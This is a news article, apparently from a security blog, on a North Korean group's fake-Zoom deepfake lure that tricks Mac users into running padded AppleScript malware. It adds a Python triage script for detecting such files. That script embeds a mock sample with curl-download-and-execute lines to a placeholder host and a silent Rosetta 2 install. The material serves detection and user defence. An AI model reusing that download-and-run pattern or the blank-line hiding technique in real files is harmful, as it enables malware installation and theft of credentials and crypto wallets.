A North Korean hacker group known as BlueNoroff has pulled off a new kind of cyberattack that blends social engineering, deepfake technology, and malware to target Mac users. This group, already linked to several cryptocurrency-related attacks in the past, has now used fake Zoom calls and artificial intelligence-generated videos to trick their victims into downloading malware onto their devices.

The attack begins when the hackers approach their target through a messaging platform like Telegram. They pose as business professionals, often pretending to represent venture capital firms or well-known tech companies. To build trust, they send a meeting invitation using a scheduling service like Calendly. The invite claims the meeting will be on Google Meet, but the link actually takes the victim to a fake Zoom page controlled by the hackers.

Once the user joins the meeting, things appear surprisingly normal. The attackers play videos of people who seem like real company executives. These videos are actually deepfakes, AI-generated recordings made to look and sound like actual people. This makes the entire setup look professional and convincing. During the call, the hackers pretend that the victim’s microphone isn’t working properly and ask them to install a Zoom “audio support extension.”

That “extension” is where the real danger begins. The file is an AppleScript (a .scpt file) that looks harmless: when run, it opens a genuine Zoom SDK page in the browser. But beneath thousands of blank lines, padding that hides it from anyone who only glances at the top of the file, is code that silently downloads and installs malware. The script also checks whether Rosetta 2, Apple’s translation layer for running Intel (x86_64) binaries on Apple silicon Macs, is installed. If it’s missing, the script installs it quietly in the background so that the Intel-built payload will also run on newer M-series Macs.
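As an added example (not code from this article or from the researchers who analysed the real sample), here is a small Python triage script for a file of the kind described above. It assumes the .scpt is plain-text AppleScript source (a compiled .scpt is binary and needs `osadecompile` first), measures how much of the file is blank-line padding, pulls out every `do shell script` command and URL, and flags a silent Rosetta 2 install. The embedded sample is constructed to mimic the described layout; its domains and paths are placeholders, not indicators from the real attack, and the padding threshold is an assumed value.

```python
"""Triage a suspicious AppleScript (.scpt) text file for blank-line padding,
shell commands and download URLs.

Added example for this article; not code from the original post or from the
researchers who analysed the real sample. Assumes the file is plain-text
AppleScript source (compiled .scpt files are binary: run `osadecompile` first).
"""
import re
import sys

# Constructed sample mimicking the layout described in the article:
# a benign-looking opener, a long run of blank lines, then the hidden
# download-and-run logic. Domains and paths are placeholders (.example),
# not indicators from the real attack.
SAMPLE_SCPT = (
    'open location "https://zoom.example/sdk-docs"\n'
    + "\n" * 3000
    + 'do shell script "curl -s https://zoom-support.example/sdk/payload.sh -o /tmp/icloud_helper.sh"\n'
    + 'do shell script "chmod +x /tmp/icloud_helper.sh && /tmp/icloud_helper.sh"\n'
    + 'if (do shell script "arch") is "arm64" then\n'
    + '    do shell script "softwareupdate --install-rosetta --agree-to-license"\n'
    + "end if\n"
)

# Constructed benign control: no padding, no shell commands.
BENIGN_SCPT = 'display dialog "Audio settings look fine."\n'

# AppleScript shell escape, allowing backslash-escaped quotes inside the string.
SHELL_RE = re.compile(r'do shell script\s+"((?:[^"\\]|\\.)*)"')
URL_RE = re.compile(r'https?://[^\s"\']+')
# The documented command-line way to install Rosetta 2 without a prompt.
ROSETTA_RE = re.compile(r"softwareupdate\s+--install-rosetta")
DOWNLOADERS = ("curl", "wget", "nscurl")


def padding_stats(text):
    """Count blank lines and the longest run of consecutive blank lines."""
    lines = text.splitlines()
    blank = longest = run = 0
    for line in lines:
        if line.strip():
            run = 0
        else:
            blank += 1
            run += 1
            longest = max(longest, run)
    return {"total_lines": len(lines), "blank_lines": blank, "longest_blank_run": longest}


def extract_indicators(text):
    """Pull out shell commands, URLs, and whether Rosetta 2 gets installed."""
    return {
        "shell_commands": [m.group(1) for m in SHELL_RE.finditer(text)],
        "urls": sorted(set(URL_RE.findall(text))),
        "installs_rosetta": bool(ROSETTA_RE.search(text)),
    }


def triage(text, min_blank_run=500):
    """Return padding stats, extracted indicators and the reasons for a verdict.

    min_blank_run is an assumed threshold: legitimate scripts do not carry
    hundreds of consecutive empty lines.
    """
    stats = padding_stats(text)
    ind = extract_indicators(text)
    reasons = []
    if stats["longest_blank_run"] >= min_blank_run:
        reasons.append(f"{stats['longest_blank_run']} consecutive blank lines hide code below the fold")
    if any(cmd.split()[0] in DOWNLOADERS for cmd in ind["shell_commands"] if cmd.split()):
        reasons.append("do shell script fetches remote content: " + ", ".join(ind["urls"]))
    if ind["installs_rosetta"]:
        reasons.append("installs Rosetta 2 silently (payload needs x86_64 support)")
    return {"stats": stats, "indicators": ind, "suspicious": bool(reasons), "reasons": reasons}


if __name__ == "__main__":
    # Usage: python triage_scpt.py [file.scpt]; with no argument, runs on the sample.
    text = open(sys.argv[1], errors="replace").read() if len(sys.argv) > 1 else SAMPLE_SCPT
    for key, value in triage(text).items():
        print(f"{key}: {value}")
```

Run it against any `.scpt` handed to a user during a call; a file whose longest blank run is in the thousands, whose `do shell script` lines call `curl`, and which installs Rosetta 2 on its own matches every characteristic the article describes, and the extracted URLs are the first indicators to block and hunt for.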

Once the malware is fully installed, it can do a lot of damage. Security experts have identified at least eight different malicious tools used in this attack. One tool logs every key the victim types, another takes screenshots, and a third watches what is copied to the clipboard. There’s also a tool specifically made to steal login data from more than 20 popular cryptocurrency wallets. Other malware modules allow the attackers to maintain access to the system and remotely control it without being noticed.

This method of attack is extremely dangerous because of how realistic and personal it feels. It’s no longer just a suspicious email or a strange file attachment. The victim is invited to a video call, sees what looks like a real person on camera, and is walked through the process step by step. By using deepfakes and real-time interaction, the hackers make it much harder for people to recognize the scam.

The goal of the attackers seems clear: steal valuable information and, more importantly, money from cryptocurrency users or businesses. BlueNoroff is known for being financially motivated and has been linked to other advanced attacks targeting banks, fintech companies, and crypto exchanges around the world. This new method shows they are getting even more creative and dangerous.

To protect yourself, never download or run scripts or software during a video call, even if the person on the call appears trustworthy; no legitimate Zoom troubleshooting step involves running a downloaded script. Check that a meeting link actually lands on the platform it claims: a Google Meet invite that opens a “Zoom” page on an unfamiliar domain is a red flag. Always verify meeting invitations and software requests through a second channel, such as emailing the person at an address you already know or contacting your IT department. If you have already run such a script, treat the Mac as compromised: disconnect it, and change passwords, revoke active sessions, and move cryptocurrency to new wallets from a clean device, since the malware described here logs keystrokes and reads wallet data. Also keep your Mac’s security tools up to date and stay informed about new forms of online threats.

This incident is a wake-up call for individuals and companies alike. The use of AI-generated deepfakes in real-time video meetings marks a new level of cybercrime. It’s a reminder that in today’s digital world, seeing isn’t always believing.

Stay alert, and keep your security measures updated!

Source: Follow cybersecurity88 on X and LinkedIn for the latest cybersecurity news